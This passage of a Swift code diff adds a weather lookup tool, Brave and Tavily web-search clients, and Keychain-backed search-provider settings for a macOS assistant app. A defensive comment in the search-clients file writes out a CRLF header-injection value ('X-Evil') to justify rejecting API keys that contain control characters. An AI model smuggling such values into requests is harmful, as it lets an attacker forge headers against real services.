+        queue.sync { storage[account] = secret }
+        return true
+    }
+
+    @discardableResult
+    func delete(account: String) -> Bool {
+        queue.sync { _ = storage.removeValue(forKey: account) }
+        return true
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/WeatherTool.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/WeatherTool.swift
@@ -1,0 +1,377 @@
+import Foundation
+
+/// Current weather lookup via two Open-Meteo endpoints:
+///
+///   1. ``geocoding-api.open-meteo.com/v1/search`` resolves the place.
+///   2. ``api.open-meteo.com/v1/forecast`` returns current temperature,
+///      relative humidity, wind speed, and the WMO weather code.
+///
+/// No API key is required. Falls back to a clean error result
+/// rather than throwing so the chat loop continues.
+enum WeatherTool {
+    static let definition = ToolDefinition(
+        name: "weather",
+        description: "Get the current weather for a city or place. Preserve the user's place name, and include country or state/province when known. Ambiguous places are not guessed.",
+        parameters: .object([
+            "type": .string("object"),
+            "properties": .object([
+                "location": .object([
+                    "type": .string("string"),
+                    "description": .string("City or place name in the user's language, optionally followed by region/country, e.g. '西安', 'Springfield, Illinois', or 'Paris, France'.")
+                ]),
+                "country": .object([
+                    "type": .string("string"),
+                    "description": .string("Optional country name or two-letter country code used to disambiguate the place.")
+                ]),
+                "admin1": .object([
+                    "type": .string("string"),
+                    "description": .string("Optional state, province, or first-level administrative region used to disambiguate the place.")
+                ]),
+                "units": .object([
+                    "type": .string("string"),
+                    "description": .string("Either 'metric' (Celsius, km/h) or 'imperial' (Fahrenheit, mph). Defaults to metric."),
+                    "enum": .array([.string("metric"), .string("imperial")])
+                ])
+            ]),
+            "required": .array([.string("location")])
+        ])
+    )
+
+    struct Args: Decodable {
+        let location: String
+        let country: String?
+        let admin1: String?
+        let units: String?
+    }
+
+    static func run(arguments: String) async -> ToolCallResult {
+        let toolName = "weather"
+        guard let data = arguments.data(using: .utf8),
+              let args = try? JSONDecoder().decode(Args.self, from: data) else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: could not parse arguments JSON", isError: true)
+        }
+        let location = args.location.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !location.isEmpty else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: empty location", isError: true)
+        }
+        let imperial = (args.units?.lowercased() == "imperial")
+        do {
+            let geo = try await geocode(
+                location: location,
+                country: cleaned(args.country),
+                admin1: cleaned(args.admin1)
+            )
+            guard let hit = geo else {
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName): could not uniquely identify \"\(location)\". Add a country or state/province and try again.",
+                    isError: false
+                )
+            }
+            let weather = try await fetchCurrentWeather(lat: hit.latitude, lon: hit.longitude, imperial: imperial)
+            let tempUnit = imperial ? "°F" : "°C"
+            let windUnit = imperial ? "mph" : "km/h"
+            var lines: [String] = []
+            lines.append("Current weather for \(hit.fullName):")
+            lines.append("  Conditions: \(weatherCodeLabel(weather.weatherCode))")
+            lines.append(String(format: "  Temperature: %.1f%@", weather.temperature, tempUnit))
+            lines.append("  Humidity: \(weather.humidity)%")
+            lines.append(String(format: "  Wind: %.1f %@", weather.windSpeed, windUnit))
+            lines.append("Data: Open-Meteo (timezone: \(hit.timezone ?? "n/a"))")
+            return ToolCallResult(toolCallID: "", content: lines.joined(separator: "\n"), isError: false)
+        } catch {
+            return ToolCallResult(
+                toolCallID: "",
+                content: "\(toolName) error: \(error.localizedDescription)",
+                isError: true
+            )
+        }
+    }
+
+    // MARK: - Geocoding
+
+    struct GeoHit: Decodable {
+        let name: String
+        let latitude: Double
+        let longitude: Double
+        let country: String?
+        let admin1: String?
+        let timezone: String?
+        let countryCode: String?
+        let population: Int?
+
+        enum CodingKeys: String, CodingKey {
+            case name, latitude, longitude, country, admin1, timezone, population
+            case countryCode = "country_code"
+        }
+
+        var fullName: String {
+            placeLabel(name, admin1, country, fallback: name)
+        }
+    }
+
+    static func geocode(location: String, country: String?, admin1: String?) async throws -> GeoHit? {
+        let query = geocodingQuery(location: location, country: country, admin1: admin1)
+        guard !query.name.isEmpty, let url = geocodingURL(location: query.name) else {
+            throw NSError(domain: "WeatherTool", code: 1, userInfo: [NSLocalizedDescriptionKey: "could not build geocoding URL"])
+        }
+        var request = URLRequest(url: url)
+        request.timeoutInterval = 8
+        let (data, response) = try await cappedData(for: request)
+        guard let http = response as? HTTPURLResponse, (200..<300).contains(http.statusCode) else {
+            throw NSError(domain: "WeatherTool", code: 2, userInfo: [NSLocalizedDescriptionKey: "geocoding HTTP \((response as? HTTPURLResponse)?.statusCode ?? -1)"])
+        }
+        return parseGeocodingResponse(
+            data,
+            location: query.name,
+            qualifiers: query.qualifiers
+        )
+    }
+
+    static func geocodingURL(location: String) -> URL? {
+        var components = URLComponents(string: "https://geocoding-api.open-meteo.com/v1/search")!
+        components.queryItems = [
+            URLQueryItem(name: "name", value: location),
+            URLQueryItem(name: "count", value: "5"),
+            URLQueryItem(name: "format", value: "json"),
+        ]
+        if let language = geocodingLanguage(for: location) {
+            components.queryItems?.append(URLQueryItem(name: "language", value: language))
+        }
+        return components.url
+    }
+
+    static func parseGeocodingResponse(
+        _ data: Data,
+        location: String,
+        qualifiers: [String] = []
+    ) -> GeoHit? {
+        struct Response: Decodable {
+            let results: [GeoHit]?
+        }
+        let candidates = (try? JSONDecoder().decode(Response.self, from: data))?.results ?? []
+        return selectGeocodingHit(location: location, qualifiers: qualifiers, candidates: candidates)
+    }
+
+    static func selectGeocodingHit(
+        location: String,
+        qualifiers: [String],
+        candidates: [GeoHit]
+    ) -> GeoHit? {
+        let requestedName = matchKey(location)
+        guard !requestedName.isEmpty else { return nil }
+
+        let requestedQualifiers = qualifiers.compactMap { qualifier -> Set<String>? in
+            let key = matchKey(qualifier)
+            guard !key.isEmpty else { return nil }
+            let countryCodes = countryCodes(for: qualifier).map(matchKey)
+            return Set([key] + countryCodes)
+        }
+        let matches = candidates.filter { candidate in
+            guard matchKey(candidate.name) == requestedName else { return false }
+            let fields = Set([candidate.admin1, candidate.country, candidate.countryCode]
+                .compactMap { $0 }
+                .map(matchKey))
+            return requestedQualifiers.allSatisfy { !$0.isDisjoint(with: fields) }
+        }
+        guard !matches.isEmpty else { return nil }
+
+        // Rank same-named candidates by population so a well-known city
+        // dominates its tiny homonyms (Tokyo over the villages).
+        let ranked = matches.sorted { ($0.population ?? 0) > ($1.population ?? 0) }
+        guard let first = ranked.first else { return nil }
+        let firstPopulation = first.population ?? 0
+
+        // With more than one same-named place, require a decisive population
+        // margin, otherwise the name is genuinely ambiguous (e.g. the US
+        // Springfields) and we return not-found rather than defaulting to API
+        // order.
+        if ranked.count > 1 {
+            let runnerUpPopulation = ranked[1].population ?? 0
+            guard firstPopulation >= max(1, runnerUpPopulation) * 5 else { return nil }
+        }
+
+        // Accept the top candidate when the user gave an explicit qualifier, or
+        // spelled the name exactly (accents and all). When the spelling only
+        // matches after folding accents/punctuation, require a major-city
+        // population floor: a bare "Xian" (only fold-match: Xián, Spain, pop ~0)
+        // stays not-found, while "Medellin" → Medellín, Colombia (pop ~2M) and
+        // "Sao Paulo" → São Paulo, Brazil still resolve. This replaces an
+        // earlier accent-sensitive hard-filter that dropped the real accented
+        // city and kept only the exact-ASCII homonym (see #584).
+        if !requestedQualifiers.isEmpty || literalKey(first.name) == literalKey(location) {
+            return first
+        }
+        return firstPopulation >= 100_000 ? first : nil
+    }
+
+    private struct GeocodingQuery {
+        let name: String
+        let qualifiers: [String]
+    }
+
+    private static func geocodingQuery(
+        location: String,
+        country: String?,
+        admin1: String?
+    ) -> GeocodingQuery {
+        let parts = location.split(separator: ",", omittingEmptySubsequences: true)
+            .map { String($0).trimmingCharacters(in: .whitespacesAndNewlines) }
+            .filter { !$0.isEmpty }
+        let name = parts.first ?? location.trimmingCharacters(in: .whitespacesAndNewlines)
+        let qualifiers = Array(parts.dropFirst()) + [admin1, country].compactMap(cleaned)
+        return GeocodingQuery(name: name, qualifiers: qualifiers)
+    }
+
+    private static func geocodingLanguage(for location: String) -> String? {
+        for scalar in location.unicodeScalars {
+            switch scalar.value {
+            case 0xAC00...0xD7AF: return "ko"
+            case 0x3040...0x30FF: return "ja"
+            case 0x3400...0x4DBF, 0x4E00...0x9FFF: return "zh"
+            default: continue
+            }
+        }
+        return nil
+    }
+
+    private static func matchKey(_ value: String) -> String {
+        let folded = value.folding(
+            options: [.caseInsensitive, .diacriticInsensitive, .widthInsensitive],
+            locale: Locale(identifier: "en_US_POSIX")
+        )
+        return String(folded.unicodeScalars.filter(CharacterSet.alphanumerics.contains))
+            .lowercased()
+    }
+
+    private static func literalKey(_ value: String) -> String {
+        value
+            .replacingOccurrences(of: "’", with: "'")
+            .trimmingCharacters(in: .whitespacesAndNewlines)
+            .lowercased()
+    }
+
+    private static func countryCodes(for value: String) -> [String] {
+        let trimmed = value.trimmingCharacters(in: .whitespacesAndNewlines)
+        if trimmed.count == 2, trimmed.unicodeScalars.allSatisfy(CharacterSet.letters.contains) {
+            return [trimmed.uppercased()]
+        }
+        let requested = matchKey(trimmed)
+        guard !requested.isEmpty else { return [] }
+        let english = Locale(identifier: "en_US")
+        let codes = Locale.Region.isoRegions.compactMap { region -> String? in
+            let code = region.identifier
+            guard code.count == 2,
+                  let name = english.localizedString(forRegionCode: code) else {
+                return nil
+            }
+            let localized = matchKey(name)
+            return localized == requested
+                || localized.hasPrefix(requested)
+                || requested.hasPrefix(localized) ? code : nil
+        }
+        // Prefix matching handles CLDR labels such as "China mainland", but
+        // only when the result is unique. "Congo" deliberately maps to none.
+        return codes.count == 1 ? codes : []
+    }
+
+    private static func cleaned(_ value: String?) -> String? {
+        guard let value else { return nil }
+        let trimmed = value.trimmingCharacters(in: .whitespacesAndNewlines)
+        return trimmed.isEmpty ? nil : trimmed
+    }
+
+    static func placeLabel(_ parts: String?..., fallback: String) -> String {
+        var unique: [String] = []
+        for part in parts {
+            guard let part else { continue }
+            let trimmed = part.trimmingCharacters(in: .whitespacesAndNewlines)
+            if !trimmed.isEmpty, !unique.contains(trimmed) {
+                unique.append(trimmed)
+            }
+        }
+        return unique.isEmpty ? fallback : unique.joined(separator: ", ")
+    }
+
+    // MARK: - Weather fetch
+
+    struct WeatherReading: Decodable {
+        let temperature: Double
+        let humidity: Int
+        let windSpeed: Double
+        let weatherCode: Int
+
+        enum CodingKeys: String, CodingKey {
+            case temperature = "temperature_2m"
+            case humidity = "relative_humidity_2m"
+            case windSpeed = "wind_speed_10m"
+            case weatherCode = "weather_code"
+        }
+    }
+
+    static func fetchCurrentWeather(lat: Double, lon: Double, imperial: Bool) async throws -> WeatherReading {
+        guard let url = forecastURL(lat: lat, lon: lon, imperial: imperial) else {
+            throw NSError(domain: "WeatherTool", code: 3, userInfo: [NSLocalizedDescriptionKey: "could not build forecast URL"])
+        }
+        var req = URLRequest(url: url)
+        req.timeoutInterval = 10
+        let (data, response) = try await cappedData(for: req)
+        guard let http = response as? HTTPURLResponse, (200..<300).contains(http.statusCode) else {
+            throw NSError(domain: "WeatherTool", code: 4, userInfo: [NSLocalizedDescriptionKey: "weather HTTP \((response as? HTTPURLResponse)?.statusCode ?? -1)"])
+        }
+        guard let reading = parseForecastResponse(data) else {
+            throw NSError(domain: "WeatherTool", code: 5, userInfo: [NSLocalizedDescriptionKey: "unrecognised forecast payload"])
+        }
+        return reading
+    }
+
+    static func forecastURL(lat: Double, lon: Double, imperial: Bool) -> URL? {
+        var components = URLComponents(string: "https://api.open-meteo.com/v1/forecast")!
+        components.queryItems = [
+            URLQueryItem(name: "latitude", value: String(lat)),
+            URLQueryItem(name: "longitude", value: String(lon)),
+            URLQueryItem(name: "current", value: "temperature_2m,relative_humidity_2m,wind_speed_10m,weather_code"),
+            URLQueryItem(name: "temperature_unit", value: imperial ? "fahrenheit" : "celsius"),
+            URLQueryItem(name: "wind_speed_unit", value: imperial ? "mph" : "kmh"),
+        ]
+        return components.url
+    }
+
+    static func parseForecastResponse(_ data: Data) -> WeatherReading? {
+        struct Response: Decodable {
+            let current: WeatherReading
+        }
+        return (try? JSONDecoder().decode(Response.self, from: data))?.current
+    }
+
+    /// WMO weather-code → human label. Open-Meteo documents these
+    /// at https://open-meteo.com/en/docs.
+    static func weatherCodeLabel(_ code: Int) -> String {
+        switch code {
+        case 0: return "Clear sky"
+        case 1: return "Mainly clear"
+        case 2: return "Partly cloudy"
+        case 3: return "Overcast"
+        case 45, 48: return "Fog"
+        case 51: return "Light drizzle"
+        case 53: return "Moderate drizzle"
+        case 55: return "Dense drizzle"
+        case 56, 57: return "Freezing drizzle"
+        case 61: return "Light rain"
+        case 63: return "Moderate rain"
+        case 65: return "Heavy rain"
+        case 66, 67: return "Freezing rain"
+        case 71: return "Light snow"
+        case 73: return "Moderate snow"
+        case 75: return "Heavy snow"
+        case 77: return "Snow grains"
+        case 80: return "Light rain showers"
+        case 81: return "Moderate rain showers"
+        case 82: return "Violent rain showers"
+        case 85, 86: return "Snow showers"
+        case 95: return "Thunderstorm"
+        case 96, 99: return "Thunderstorm with hail"
+        default: return "Code \(code)"
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/WebSearchClients.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/WebSearchClients.swift
@@ -1,0 +1,199 @@
+import Foundation
+
+/// Codex audit batch 6 finding (WebSearchClients.swift:31, P2):
+/// an API key pasted with a CR/LF or other ASCII control byte
+/// would survive the outer ``trimmingCharacters(in: .whitespacesAndNewlines)``
+/// at the storage layer (which trims only LEADING/TRAILING
+/// whitespace) and reach ``URLRequest.setValue(_:forHTTPHeaderField:)``.
+/// URLRequest does NOT validate header values for CRLF — it will
+/// happily produce a request whose serialised header bytes
+/// contain ``X-Subscription-Token: bravekey<CR><LF>X-Evil: foo``.
+/// Defensive check: refuse to build the request when the key
+/// contains any control byte.
+private func headerSafeKey(_ apiKey: String) -> String? {
+    let trimmed = apiKey.trimmingCharacters(in: .whitespacesAndNewlines)
+    guard !trimmed.isEmpty else { return nil }
+    for scalar in trimmed.unicodeScalars {
+        // Reject all C0 control bytes (0x00-0x1F) and DEL (0x7F).
+        if scalar.value < 0x20 || scalar.value == 0x7F { return nil }
+    }
+    return trimmed
+}
+
+/// Codex audit batch 6 finding (WebSearchTool.swift:137 / WeatherTool.swift:105, P2/P3):
+/// every provider call read the full response body via
+/// ``URLSession.shared.data(for:)``. A misbehaving (or hostile)
+/// upstream that returns a multi-GB response would balloon the
+/// app's memory before any JSON parse runs. ``cappedData`` streams
+/// from ``URLSession.bytes`` and aborts the moment the body
+/// crosses the limit. 1 MB is generous for any of the listed
+/// search backends (a 6-result Brave/Tavily payload is < 100 KB
+/// in practice). Throws on cap-exceeded so the caller surfaces a
+/// clear error rather than silently truncated JSON.
+func cappedData(for request: URLRequest, byteCap: Int = 1_048_576) async throws -> (Data, URLResponse) {
+    let (stream, response) = try await URLSession.shared.bytes(for: request)
+    var data = Data()
+    data.reserveCapacity(min(byteCap, 64 * 1024))
+    for try await byte in stream {
+        if data.count >= byteCap {
+            throw NSError(
+                domain: "RapidWebSearch",
+                code: 413,
+                userInfo: [NSLocalizedDescriptionKey: "response exceeded \(byteCap / 1024) KB cap"]
+            )
+        }
+        data.append(byte)
+    }
+    return (data, response)
+}
+
+/// Brave Search API client. The free tier serves 2 000 queries/month
+/// and the request shape is a plain GET with a single header carrying
+/// the subscription key.
+///
+/// We deliberately request a small ``count`` (matches WebSearchTool's
+/// existing 6-result cap) because the model only quotes the first
+/// few results and every extra result costs the user a query slot.
+enum BraveSearchClient {
+    static let endpoint = "https://api.search.brave.com/res/v1/web/search"
+    static let timeout: TimeInterval = 15
+
+    /// Builds a fully-formed URLRequest for the Brave Search API.
+    /// Extracted so tests can pin the URL / header / body shape
+    /// without spinning up URLSession. Returns ``nil`` when the
+    /// API key contains a control character (codex audit batch 6,
+    /// P2 — CRLF in a pasted key would inject a header).
+    static func buildRequest(query: String, apiKey: String, count: Int) -> URLRequest? {
+        guard let cleanKey = headerSafeKey(apiKey) else { return nil }
+        var components = URLComponents(string: endpoint)
+        components?.queryItems = [
+            URLQueryItem(name: "q", value: query),
+            URLQueryItem(name: "count", value: String(count)),
+            URLQueryItem(name: "safesearch", value: "moderate"),
+        ]
+        guard let url = components?.url else { return nil }
+        var req = URLRequest(url: url)
+        req.httpMethod = "GET"
+        req.timeoutInterval = timeout
+        // Brave's required header. ``Accept: application/json``
+        // makes them respond with the structured payload (the
+        // default is the HTML SERP, which we'd have to scrape).
+        req.setValue(cleanKey, forHTTPHeaderField: "X-Subscription-Token")
+        req.setValue("application/json", forHTTPHeaderField: "Accept")
+        return req
+    }
+
+    /// Parse Brave's JSON response into the engine-agnostic
+    /// ``WebSearchTool.Result`` shape so the rest of the pipeline
+    /// doesn't need to know which backend ran the query.
+    ///
+    /// Brave returns ``{ "web": { "results": [{ "title", "url",
+    /// "description" }] } }``. We tolerate missing/empty fields
+    /// gracefully — a result row that's missing a title is still
+    /// useful if the URL is present.
+    static func parseResults(_ data: Data, cap: Int) -> [WebSearchTool.Result] {
+        struct Envelope: Decodable {
+            struct Web: Decodable {
+                let results: [Item]?
+            }
+            struct Item: Decodable {
+                let title: String?
+                let url: String?
+                let description: String?
+            }
+            let web: Web?
+        }
+        guard let env = try? JSONDecoder().decode(Envelope.self, from: data) else {
+            return []
+        }
+        let items = env.web?.results ?? []
+        var out: [WebSearchTool.Result] = []
+        for item in items {
+            if out.count >= cap { break }
+            let url = item.url ?? ""
+            // Filter out non-http(s) hits — same safety gate as
+            // the DDG path. Brave is well-behaved here but we
+            // defend at the boundary anyway.
+            guard WebSearchTool.isSafeHttpURL(url) else { continue }
+            out.append(WebSearchTool.Result(
+                title: item.title ?? "",
+                url: url,
+                snippet: item.description ?? ""
+            ))
+        }
+        return out
+    }
+}
+
+/// Tavily Search API client. The free tier serves 1 000 queries/month.
+/// Request shape is a POST with the key inside the JSON body —
+/// Tavily explicitly does not accept the key in a header.
+enum TavilySearchClient {
+    static let endpoint = "https://api.tavily.com/search"
+    static let timeout: TimeInterval = 15
+
+    /// Builds a fully-formed URLRequest for the Tavily Search API.
+    /// The key lives in the JSON body, ``api_key``.
+    ///
+    /// ``search_depth: "basic"`` is the cheap tier (1 credit per
+    /// query); ``"advanced"`` costs 2 credits and runs LLM
+    /// re-ranking server-side. We keep basic by default — the
+    /// model is local and quoting results, the extra re-ranking
+    /// is mostly redundant.
+    static func buildRequest(query: String, apiKey: String, maxResults: Int) -> URLRequest? {
+        // Tavily takes the key in the JSON body rather than a
+        // header, so CRLF can't inject. But we still want to
+        // reject control bytes in case a paste introduced them
+        // by accident — JSON body containing a literal newline
+        // breaks the upstream parser anyway.
+        guard let cleanKey = headerSafeKey(apiKey) else { return nil }
+        guard let url = URL(string: endpoint) else { return nil }
+        var req = URLRequest(url: url)
+        req.httpMethod = "POST"
+        req.timeoutInterval = timeout
+        req.setValue("application/json", forHTTPHeaderField: "Content-Type")
+        req.setValue("application/json", forHTTPHeaderField: "Accept")
+        let body: [String: Any] = [
+            "api_key": cleanKey,
+            "query": query,
+            "max_results": maxResults,
+            "search_depth": "basic",
+        ]
+        guard let data = try? JSONSerialization.data(withJSONObject: body) else { return nil }
+        req.httpBody = data
+        return req
+    }
+
+    /// Parse Tavily's JSON response. The schema is
+    /// ``{ "results": [{ "title", "url", "content" }] }``.
+    /// ``content`` is the snippet — Tavily ships a pre-summarised
+    /// extract rather than a raw description, which usually reads
+    /// better than DDG's HTML scrape but occasionally truncates a
+    /// useful fact. We don't second-guess.
+    static func parseResults(_ data: Data, cap: Int) -> [WebSearchTool.Result] {
+        struct Envelope: Decodable {
+            struct Item: Decodable {
+                let title: String?
+                let url: String?
+                let content: String?
+            }
+            let results: [Item]?
+        }
+        guard let env = try? JSONDecoder().decode(Envelope.self, from: data) else {
+            return []
+        }
+        let items = env.results ?? []
+        var out: [WebSearchTool.Result] = []
+        for item in items {
+            if out.count >= cap { break }
+            let url = item.url ?? ""
+            guard WebSearchTool.isSafeHttpURL(url) else { continue }
+            out.append(WebSearchTool.Result(
+                title: item.title ?? "",
+                url: url,
+                snippet: item.content ?? ""
+            ))
+        }
+        return out
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/WebSearchProvider.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/WebSearchProvider.swift
@@ -1,0 +1,412 @@
+import Foundation
+import Observation
+
+/// Which backend does ``web_search`` hit? v0.4.41 adds the two
+/// dominant paid options on top of the existing free DDG endpoint.
+///
+/// Why these three:
+///   * **DuckDuckGo** — no key, decent quality, the original
+///     v0.3 backend. Stays the default so a fresh install keeps
+///     working without any setup.
+///   * **Brave Search** — 2 000 queries/month free tier; high
+///     quality, fast, ad-free index.
+///   * **Tavily** — 1 000 queries/month free tier; explicitly
+///     designed for LLM agents (returns clean snippets + a
+///     ranked list, no SERP cruft).
+///
+/// Both paid options ask for a long-lived API key. Keys are
+/// stored in the macOS Keychain, NOT UserDefaults — leaking a
+/// Brave/Tavily key reads as a real privacy bug (the key is
+/// account-linked and per-call billing is metered against it).
+enum WebSearchProvider: String, CaseIterable, Codable, Identifiable, Sendable {
+    case duckduckgo
+    case brave
+    case tavily
+
+    var id: String { rawValue }
+
+    var displayName: String {
+        switch self {
+        case .duckduckgo: return "DuckDuckGo"
+        case .brave:      return "Brave Search"
+        case .tavily:     return "Tavily"
+        }
+    }
+
+    /// Plain-English subtitle for the Settings picker. Tells the
+    /// user what they're trading off (cost / signup) without
+    /// having to read the docs.
+    var subtitle: String {
+        switch self {
+        case .duckduckgo:
+            return "No key required. HTML scrape; works out of the box."
+        case .brave:
+            return "Requires a free Brave Search API key. 2 000 queries/month."
+        case .tavily:
+            return "Requires a free Tavily API key. 1 000 queries/month, agent-tuned snippets."
+        }
+    }
+
+    /// Where the user goes to mint a key. Shown as an "Open
+    /// dashboard" link in Settings so the affordance is one click
+    /// instead of "Google for the right URL."
+    var keyConsoleURL: URL? {
+        switch self {
+        case .duckduckgo: return nil
+        case .brave:      return URL(string: "https://brave.com/search/api/")
+        case .tavily:     return URL(string: "https://app.tavily.com/home")
+        }
+    }
+
+    /// Direct link to the API-keys dashboard for the provider — the
+    /// page that lists existing keys and offers a "create new key"
+    /// affordance. Distinct from ``keyConsoleURL`` (the marketing
+    /// landing) because the "Upgrade to Brave" / "Upgrade to Tavily"
+    /// nudge in Settings + Onboarding wants to drop the user one
+    /// click closer to a usable key — landing on a marketing page
+    /// adds an extra "click Sign in / Get key" hop. Issue #193.
+    ///
+    /// For Tavily this resolves to the same /home page as
+    /// ``keyConsoleURL`` (the dashboard IS the home view). Brave
+    /// splits: ``keyConsoleURL`` points at the public api docs
+    /// landing, ``keyDashboardURL`` jumps straight to /app/keys.
+    var keyDashboardURL: URL? {
+        switch self {
+        case .duckduckgo: return nil
+        case .brave:      return URL(string: "https://api.search.brave.com/app/keys")
+        case .tavily:     return URL(string: "https://app.tavily.com/home")
+        }
+    }
+
+    /// True only when the provider needs an API key. Lets the
+    /// Settings panel hide the SecureField when DDG is selected.
+    var requiresKey: Bool {
+        switch self {
+        case .duckduckgo: return false
+        case .brave, .tavily: return true
+        }
+    }
+
+    /// Keychain account label used to store this provider's
+    /// API key. Distinct per-provider so a Brave key never
+    /// leaks into a Tavily call (and vice versa).
+    var keychainAccount: String? {
+        switch self {
+        case .duckduckgo: return nil
+        case .brave:      return "rapid.web-search.brave"
+        case .tavily:     return "rapid.web-search.tavily"
+        }
+    }
+}
+
+/// User-facing, persisted web-search configuration. Provider
+/// choice lives in UserDefaults; the API key (when needed) lives
+/// in Keychain. ``ChatViewModel`` and ``WebSearchTool`` both read
+/// this; the Settings panel mutates it.
+@MainActor
+@Observable
+final class WebSearchConfig {
+    /// Backed by ``UserDefaults`` under a single stable key so a
+    /// reset-defaults action (or a corrupted prefs file) doesn't
+    /// need to sweep multiple keys. The default is ``.duckduckgo``
+    /// because that's the only zero-setup option.
+    var provider: WebSearchProvider {
+        didSet {
+            guard oldValue != provider else { return }
+            defaults.set(provider.rawValue, forKey: Self.providerKey)
+        }
+    }
+
+    private static let providerKey = "rapid.webSearch.provider"
+
+    private let defaults: UserDefaults
+    private let keychain: KeychainStoring
+
+    /// Per-account in-memory cache of decrypted secrets. Populated
+    /// on first read; ``setAPIKey`` keeps it in sync with the
+    /// keychain. Closes issue #23: ``SecItemCopyMatching`` blocks
+    /// the main actor across the securityd XPC hop (can spike to
+    /// tens of ms when the Keychain agent is cold), and the
+    /// ``web_search`` tool fires this on every dispatch.
+    private var keyCache: [String: String] = [:]
+
+    /// Accounts we've already hit the keychain for. Separate from
+    /// ``keyCache`` so we can distinguish "not in cache, haven't
+    /// looked" from "looked, no secret stored" — the latter must
+    /// short-circuit ``apiKey(for:)`` without another keychain hit.
+    private var probedAccounts: Set<String> = []
+
+    /// Injection points for tests. Default arguments use the real
+    /// system Keychain + the host's standard UserDefaults; the
+    /// test suite swaps in an in-memory pair so contracts can be
+    /// pinned without polluting the user's actual settings.
+    init(
+        defaults: UserDefaults = .standard,
+        keychain: KeychainStoring = SystemKeychain()
+    ) {
+        self.defaults = defaults
+        self.keychain = keychain
+        if let raw = defaults.string(forKey: Self.providerKey),
+           let p = WebSearchProvider(rawValue: raw) {
+            self.provider = p
+        } else {
+            self.provider = .duckduckgo
+        }
+    }
+
+    // MARK: - Key access
+
+    /// Returns the stored key for ``provider`` (if it needs one
+    /// and one has been entered). DuckDuckGo always returns nil.
+    ///
+    /// Cached after first read — subsequent calls do **not** hit
+    /// the keychain. ``setAPIKey`` invalidates and refreshes the
+    /// cache on every write so the cache stays consistent with
+    /// the on-disk Keychain state owned by this process.
+    func apiKey(for provider: WebSearchProvider) -> String? {
+        guard let account = provider.keychainAccount else { return nil }
+        if probedAccounts.contains(account) {
+            // Trim whitespace defensively — users frequently paste a
+            // key with a trailing newline they didn't notice, and the
+            // HTTP header has to land clean or the upstream rejects.
+            return keyCache[account]?.trimmingCharacters(in: .whitespacesAndNewlines).nonEmpty
+        }
+        let value = keychain.read(account: account)
+        probedAccounts.insert(account)
+        if let value, !value.isEmpty {
+            keyCache[account] = value
+        }
+        return value?.trimmingCharacters(in: .whitespacesAndNewlines).nonEmpty
+    }
+
+    /// Write or clear the key for ``provider``. Passing an empty
+    /// / whitespace-only string clears the slot (so the SecureField's
+    /// "delete + tab" gesture removes the key instead of storing
+    /// an empty record that pretends to be a key).
+    ///
+    /// **Auto-promote on first key paste.** If the user is still on
+    /// the install-default ``.duckduckgo`` backend and pastes a key
+    /// for a paid provider (``.brave`` or ``.tavily``), we silently
+    /// flip ``provider`` to the keyed backend.
+    ///
+    /// Why: DDG HTML scraping is silently rate-limited / anti-bot-
+    /// blocked in production today — the `cc=botnet` anomaly modal
+    /// returns 0 results without surfacing a real error, so the
+    /// tool appears to "work" while delivering nothing. When a user
+    /// goes to the trouble of pasting a Brave/Tavily key they have
+    /// explicitly opted into a more reliable backend; requiring them
+    /// to ALSO flip the provider picker is silent-broken UX (their
+    /// key is stored but never used).
+    ///
+    /// We only auto-promote from the default DDG state. If the user
+    /// has already explicitly chosen a paid backend (say `.brave`)
+    /// and then pastes a key for the OTHER paid backend (`.tavily`),
+    /// the explicit prior choice wins — they're managing both keys
+    /// without re-selecting. Clearing a key never demotes; the user
+    /// can manually switch back to DDG in Settings.
+    /// Returns ``true`` when the Keychain write/delete that backs the
+    /// requested mutation actually succeeded. v0.6.7 added the
+    /// return value to drive the inline "Saved" confirmation in
+    /// Settings → Web Search — silently dropping a write (locked DB
+    /// / missing entitlement) must not flash a misleading success
+    /// toast at the user. Pre-existing call sites that just want
+    /// fire-and-forget can keep ignoring the result thanks to
+    /// ``@discardableResult``.
+    @discardableResult
+    func setAPIKey(_ key: String?, for provider: WebSearchProvider) -> Bool {
+        guard let account = provider.keychainAccount else { return false }
+        let trimmed = key?.trimmingCharacters(in: .whitespacesAndNewlines) ?? ""
+        if trimmed.isEmpty {
+            // ``delete`` returns true on success or ``errSecItemNotFound``;
+            // either way the post-condition is "no key on disk", so
+            // mark probed + clear the cache. Real failure (e.g. locked
+            // DB) returns false — preserve the prior probe state and
+            // leave the cache untouched so a later ``apiKey(for:)``
+            // can still resolve a value that's actually present on
+            // disk.
+            if keychain.delete(account: account) {
+                keyCache.removeValue(forKey: account)
+                probedAccounts.insert(account)
+                return true
+            }
+            return false
+        } else {
+            // ``SystemKeychain.write`` returns false on a real
+            // Keychain failure (entitlement / locked DB / item-
+            // class collision). On failure we must NOT update the
+            // in-memory cache (would lie to later ``apiKey(for:)``
+            // callers — they'd see the key in memory while the
+            // disk-backed Keychain is empty), NOT promote the
+            // provider (would leave defaults pointing at a paid
+            // backend with no usable key; ``currentProviderUsable``
+            // flips to false at dispatch and the user lands on a
+            // confusing "selected Brave, getting DDG" state on next
+            // launch), AND NOT mark probed — codex r2 P2: negative-
+            // caching a failed write would short-circuit
+            // ``apiKey(for:)`` to nil for the rest of the process
+            // even though a previously-stored key may still be on
+            // disk, silently disabling the provider until restart.
+            if keychain.write(account: account, secret: trimmed) {
+                keyCache[account] = trimmed
+                probedAccounts.insert(account)
+                // Auto-promote happens AFTER a successful keychain
+                // write so the provider state can never get ahead of
+                // the stored key. Gate on ``provider.requiresKey``
+                // so a hypothetical future free provider can't
+                // trigger promotion via this path — the silent-
+                // broken UX only exists for keyed backends.
+                if self.provider == .duckduckgo && provider.requiresKey {
+                    self.provider = provider
+                }
+                return true
+            }
+            return false
+        }
+    }
+
+    /// True if the currently-selected provider has a usable key
+    /// (or doesn't need one). Drives the "Effective backend" hint
+    /// in Settings — when this is false, the tool will fall back
+    /// to DuckDuckGo at dispatch time.
+    var currentProviderUsable: Bool {
+        switch provider {
+        case .duckduckgo: return true
